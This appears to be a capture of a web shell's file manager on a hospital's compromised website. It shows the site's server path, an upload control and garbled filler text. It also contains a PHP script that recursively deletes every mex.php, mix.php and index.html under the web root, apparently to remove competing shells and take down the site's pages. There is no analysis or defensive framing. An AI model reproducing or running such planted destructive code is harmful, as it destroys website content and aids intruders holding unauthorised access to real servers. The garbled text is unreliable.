kohjhjhصثقصثقصثقgdfgdg
Ele57885fddfgdfgfghgقفغفغفقhfg555434536
/
home
/
u542670534
/
domains
/
jyoteyehospital.co.in
/
public_html
/
Upload FileeE
HOME
<?php function deleteMaxFiles($dir) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $fullPath = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($fullPath)) { deleteMaxFiles($fullPath); // Recursive } elseif ($file === 'mex.php') { unlink($fullPath); echo "Deleted: $fullPath<br>"; } elseif ($file === 'mix.php') { unlink($fullPath); echo "Deleted: $fullPath<br>"; } elseif ($file === 'index.html') { unlink($fullPath); echo "Deleted: $fullPath<br>"; } } } $root = __DIR__; deleteMaxFiles($root); echo "Done."; ?>